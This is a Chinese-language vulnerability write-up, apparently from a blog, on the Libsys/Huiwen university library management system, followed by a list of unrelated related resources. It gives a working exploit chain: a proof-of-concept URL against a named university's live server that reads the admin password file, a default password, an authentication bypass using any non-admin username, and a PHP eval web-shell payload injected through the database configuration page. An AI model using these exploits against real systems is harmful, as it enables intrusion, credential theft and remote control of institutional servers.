libsys是一个图书馆管理系统,蛮多大学使用,详情见官网。
- /zplug/ajax_asyn_link.old.php任意文件包含(可查看后台admin密码,v5.0版本可getshell)
- /admin/login.php任意用户登录漏洞(v5.0版本可getshell)
- 默认密码:
huiwen_opac
0x1. /zplug/ajax_asyn_link.old.php 任意文件包含(v5.0可getshell)
/zplug/ajax_asyn_link.old.php
<?php
$url = $_REQUEST['url'];
if ( $url && $url != "" )
{
$ret = file_get_contents( $url );
}
else
{
$ret = "";
}
echo $ret;
?>
libsys系统使用了zend加密,代码需要用dezender解密,我用的黑刀dezender5,内核三方式解密,还可以在http://www.showmycode.com/上在线解密,成功率不是100%
很明显,存在任意文件包含。由于后台密码存在/admin/opacadminpwd.php文件中,所以
获取后台密码POC:http://lib.zstu.edu.cn/hwweb/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
$strPassWdFile是系统管理员密码
$strPassWdView是书评管理员密码
后台地址:http://lib.zstu.edu.cn/hwweb/admin/login.php
密码cmd5解密后,即可登录。
分析下如何getshell:
在admin/cfg_database.php中
$fulltextPath = $_REQUEST['fulltext_path'];
$strFile2 = "\$user = \"".$user."\";\r\n\$password = \"".$password."\";\r\n\$host = \"".$host."\";\r\n\$sid = \"".$sid."\";\r\n\$port = \"".$port."\";\r\n\$fulltextPath=\"".$fulltextPath."\";";
$strMsg2 = write_para( "../include/hwopacpwd.php", $strFile2 );
/admin/func_write_para.php
function write_para( $strFileName, $strPara )
{
$fhandle = fopen( $strFileName, "wb" );
if ( $fhandle )
{
$strPara = "<?php\n".$strPara."\n?>";
if ( fwrite( $fhandle, $strPara ) )
{
fclose( $fhandle );
$strMsg = "数据修改成功。";
}
else
{
$strMsg = "数据修改失败。";
}
}
else
{
$strMsg = "数据修改失败。";
}
return $strMsg;
}
数据库配置:http://lib.zstu.edu.cn/hwweb/admin/cfg_database.php
可以发现,只要修改数据库配置信息,就能将配置信息写入/include/hwopacpwd.php文件中,所以getshell只需将全文索引文件夹路径修改为:c:/hwopac/index/";@eval($_POST['joychou']);//
菜刀连接后,可以看到hwopacpwd.php如下
0x2. /admin/login.php任意用户登录漏洞
/admin/login.php
session_start( );
if ( isset( $_REQUEST['username'] ) )
{
$strUser = trim( $_REQUEST['username'] );
$strInput = trim( $_REQUEST['passwd'] );
$strMsg = "用户名或者密码错误";
switch ( $strUser )
{
case "opac_admin" :
$strPassWd = $strPassWdFile;
$strMsg = verify_pwd( $strInput, $strPassWd );
$strUrl = "cfg_basic.php";
break;
case "view_admin" :
$strPassWd = $strPassWdView;
$strMsg = verify_pwd( $strInput, $strPassWd );
$strUrl = "cfg_review.php";
break;
default :
$strMsg = "用户名或者密码错误";
break;
}
if ( $strMsg == false )
{
$strMsg = "用户名或者密码错误";
}
else
{
$_SESSION['ADMIN_USER'] = $strUser;
header( "Location:".$strUrl );
}
}
可以发现,当post的username不是opac_admin和view_admin的时候,执行$_SESSION['ADMIN_USER'] = $strUser;
再访问/admin/cfg_database.php时,会有如下的验证。当$_SESSION['ADMIN_USER']不为空时,验证通过,成功登录后台。
session_start( );
if ( !isset( $_SESSION['ADMIN_USER'] ) )
{
header( "Location:login.php" );
exit( );
}
还是拿上面的例子举例吧。或者搜索opac v5
先随便提交一个username和passwd的post数据:username=joychou&passwd=joychou
再访问/admin/cfg_database.php即可登录后台。并且可以像上面的操作一样getshell
相关推荐
05-1汇文LIBSYS图书馆管理系统主要技术指标
libsysHelper抓取 Libsys 图书馆管理系统 部分信息测试ing
巧用汇文文献信息系统Libsys5.5解决几个大数据问题.pdf
汇文移动图书馆项目介绍.pptx
汇文图书管理系统借阅.pdf
05-1汇文LibsysBS图书馆集群管理系统主要技术指标
巧用汇文文献信息系统Libsys5.5解决几个大数据问题
这是一个Wordpress插件, LDAP、汇文Libsys账号与wordpress 帐户的统一认证, 用户可以以LDAP账号,或者汇文Libsys账号登录Wordpress,自动获取姓名、部门等一些信息
汇文 OPAC 系统第三方 Chrome 扩展程序,可以更方便地检索图书馆资源和检查到期图书。 基于 重构,适用于汇文 OPAC 系统 V4.5 和 V5.0。 更详细的介绍请阅读 安装扩展 本程序暂未发布到扩展商店,请使用开发者模式...
图书馆电子资源远程访问系统,仿ezProxy的web代理,用于校外访问图书馆的电子资源,账号与汇文系统整合
阐述了汇文文献管理系统在民族院校图书馆的图书编目、典藏、流通、统计工作中的应用.认为实现图书馆自动化不仅是高校图书馆的需要,更是科学技术迅速发展和文献建设的需要。
汇文接口完成版,有要用的汇文的可以看看,希望有用
资源名称:汇文教育实地培训QT教程 资源目录:【】1.Qt介绍【】1.手工布局【】2.Qt对象命名与类图【】2.设置固定大小【】3.第一个Qt 应用程序【】3.系统信号与槽【】4.第一个程序解决方法【】4.自定义槽方法【】5....
VB结合SQL语句对汇文系统数据表的维护管理.pdf
汇文系统55新功能.doc
基于校园一卡通系统的图书馆汇文文献信息服务系统对接,实现了使校园卡借阅图书及相关功能。对于办理了校园卡的人员采用校园卡借阅图书,并交纳超期罚款等费用,对于未办理校园卡的人员仍然维持现状,即采用借书证...
这是一个项目管理的课程设计,包含项目启动、系统设计、项目进度计划、项目成本估算、项目质量计划、项目风险管理等部分。共5800字,14页、看需求下载 在新兴技术迅猛发展的今天,高校图书馆是否利用新技术是评判一...